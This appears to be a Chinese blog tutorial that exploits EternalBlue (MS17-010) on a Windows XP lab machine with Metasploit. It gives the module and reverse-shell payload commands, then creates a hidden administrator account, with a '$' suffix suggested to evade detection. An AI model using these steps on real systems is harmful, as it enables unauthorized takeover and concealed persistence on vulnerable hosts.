windows永恒之蓝漏洞攻击测试
百度百科:
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
攻击机器:kali 2021
1. 打开msfconsole攻击脚本
2. 查找永恒之蓝的相关攻击脚本 search ms17-010
3. 如上所示,搜索出来几个永恒之蓝的攻击脚本,我们选择一个使用, use exploit/windows/smb/ms17_010_psexec
选择之后,再展示一下可攻击的漏洞和脚本,show payloads
4. 设置攻击的木马程序 set payload windows/shell/reverse_tcp
设置之后,就需要给这个攻击方法设置一个参数,如下,设置一个攻击主机IP和被攻击的远程主机IP,即132是被攻击的xp机器,131是我本地的攻击机,最后再查看一下当前的参数信息,show options
5. 开始攻击,执行exploit命令,或者run命令即可以开始运行攻击脚本,开始攻击永恒之蓝漏洞
看到如上所示的的时候,即说明攻击完成了,上面显示攻击已成功,攻击成功之后,则可以自动登录到靶机的shell界面,如果没有则输入shell即可自动登录到dos,对于windows系统来说就是dos系统了,如下,我直接添加了一个新的用户名,并且把该用户添加到管理员组里面,到此为止,攻击成功,该方法添加的用户名会被靶机发现,如果不想被发现,则可以给用户名后面添加一个$符号
如果没有则输入shell即可自动登录到dos
靶机:windows xp专业版
经过上述攻击之后,则可以再靶机看到被添加了一个sb的用户名,并且是超级管理员用户组
原创文章,转载请注明出处:http://124.221.219.47/article/yhzl/